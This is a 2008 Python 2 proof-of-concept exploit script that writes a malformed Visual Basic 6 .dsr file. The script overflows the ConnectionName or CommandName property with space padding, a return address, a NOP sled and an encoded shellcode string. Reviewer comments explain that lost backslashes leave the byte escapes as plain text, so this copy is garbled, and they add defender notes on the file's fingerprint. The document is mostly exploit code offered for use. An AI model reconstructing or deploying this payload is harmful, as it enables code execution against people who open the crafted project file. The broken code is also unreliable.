
msvis-dsr.txt

Posted on 19 January 2008

#usage: exploit.py
"""Generate a malformed VB6 DataEnvironment (.dsr) file for a 2008 PoC.

Python 2 syntax throughout (``print`` statement, ``raw_input``).  The script
writes one of two files -- ``ConnectionName.dsr`` or ``CommandName.dsr`` --
whose ``ConnectionName`` / ``CommandName`` property value is an overlong,
space-padded string.  Opening such a file in the affected VB6 build is what
the author's banner describes; nothing here runs against a target by itself.

NOTE(review): the listing was recovered from a text dump that appears to have
stripped every backslash.  ``"xFFxBEx3Fx7E"``, ``"x90x90x90x90"``, the long
``shellcode`` literal and the ``"x0Dx0A"`` terminator are therefore plain
ASCII text as written here, not the byte values the author's own comments
refer to.  Line continuations below are reconstructed the same way and are
the reviewer's best reading of the collapsed original.

Defender notes: a .dsr / DataEnvironment file whose ConnectionName or
CommandName value is several hundred bytes long and padded with spaces is
the fingerprint of this PoC; project files from untrusted sources should not
be opened in an unpatched VB6 IDE.
"""

import time

print "---------------------------------------------------------------------------"
print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow '
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org "
print " Once you create the file, open it with Visual Basic 6 and click on"
print " connection or command name."
print "---------------------------------------------------------------------------"

# Author's comment names this as a return address; as written (escapes lost)
# it is eight ASCII characters, not four bytes.
EIP = "xFFxBEx3Fx7E" #call ESP from user32.dll

# Same caveat: intended as NOP bytes, currently a 12-character ASCII string.
nop = "x90x90x90x90"

# Payload literal, reproduced as found.  Inert as written (see module docstring).
shellcode = \
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+\
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+\
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+\
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+\
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+\
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+\
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+\
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+\
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+\
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+\
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+\
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+\
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+\
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+\
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+\
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+\
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+\
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+\
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+\
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+\
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+\
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"

# The outer try wraps input parsing AND all three branches, so any exception
# raised below (including ValueError from int() on non-numeric input, and
# KeyboardInterrupt, because the except is bare) lands in the "you want it"
# handler at the bottom.
try:
    choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\
    '3 to quit: ==> '))
    if choice == 1:
        # Overlong property value: name + 559 spaces + EIP + 12 x 'A' + nop + payload + nop.
        buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
        try:
            # Whole .dsr body is a single line; only the final "x0Dx0A"
            # (intended CRLF, escapes lost) terminates it.
            vb_dsr = \
            'VERSION 5.00 '+\
            'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1 '+\
            ' ClientHeight = 6315 '+\
            ' ClientLeft = 0'+\
            ' ClientTop = 0 '+\
            ' ClientWidth = 7935 '+\
            ' _ExtentX = 13996 '+\
            ' _ExtentY = 11139 '+\
            ' FolderFlags = 1 '+\
            ' TypeInfoCookie = 0 '+\
            ' Version = 4 '+\
            ' NumConnections = 1 '+\
            ' BeginProperty Connection1 '+\
            ' ConnectionName = "' + buff + '" '+\
            ' ConnDispId = 1001 '+\
            ' SourceOfData = 3 '+\
            ' QuoteChar = 34 '+\
            ' SeparatorChar = 46 '+\
            ' EndProperty '+\
            ' NumRecordsets = 0 '+\
            'End' + "x0Dx0A" #"x0Dx0A" ==> EOF
            # Text mode 'w' on Windows would additionally translate any real
            # newline; none is present here.  File handle is closed explicitly
            # rather than via a `with` block.
            out_file = open('ConnectionName.dsr','w')
            out_file.write(vb_dsr)
            out_file.close()
            print "FILE CREATED!"
        except:
            # Bare except: the actual IOError/OSError reason is discarded.
            print "Something wrong in file creation!"
    if choice == 2:
        # Same layout as branch 1 with a different name and 566 bytes of padding.
        buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
        try:
            # Valid Connection1 block, then the overlong value is placed in
            # Recordset1's CommandName instead.
            vb_dsr = \
            'VERSION 5.00 '+\
            'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1 '+\
            ' ClientHeight = 6315 '+\
            ' ClientLeft = 0'+\
            ' ClientTop = 0 '+\
            ' ClientWidth = 7935 '+\
            ' _ExtentX = 13996 '+\
            ' _ExtentY = 11139 '+\
            ' FolderFlags = 1 '+\
            ' TypeInfoCookie = 0 '+\
            ' Version = 4 '+\
            ' NumConnections = 1 '+\
            ' BeginProperty Connection1 '+\
            ' ConnectionName = "Connection1" '+\
            ' ConnDispId = 1001 '+\
            ' SourceOfData = 3 '+\
            ' QuoteChar = 34 '+\
            ' SeparatorChar = 46 '+\
            ' EndProperty '+\
            ' NumRecordsets = 1 '+\
            ' BeginProperty Recordset1 '+\
            ' CommandName = "' + buff + '" '+\
            ' CommDispId = 1002 '+\
            ' RsDispId = -1 '+\
            ' ActiveConnectionName= "Connection1" '+\
            ' NumFields = 0 '+\
            ' NumGroups = 0 '+\
            ' ParamCount = 0 '+\
            ' RelationCount = 0 '+\
            ' AggregateCount = 0 '+\
            ' EndProperty '+\
            'End' + "x0Dx0A" #"x0Dx0A" ==> EOF
            out_file = open('CommandName.dsr','w')
            out_file.write(vb_dsr)
            out_file.close()
            print "FILE CREATED!"
        except:
            # Bare except: the actual IOError/OSError reason is discarded.
            print "Something wrong in file creation!"
    if choice == 3:
        print "Be safe!"
    if choice !=1 and choice != 2 and choice != 3:
        print "D'oh! You MUST choose a value between 1 and 3"
except:
    # Reached on non-numeric input (or Ctrl-C).  The placement of the two
    # statements after the print is inferred from the collapsed listing;
    # they flood the terminal with the repeated string 99999 times.
    print "mmm... ok, you want it..."
    time.sleep(4)
    print "London Bridge is falling down, Falling down, falling down London Bridge is falling down My fair lady" * 99999

 
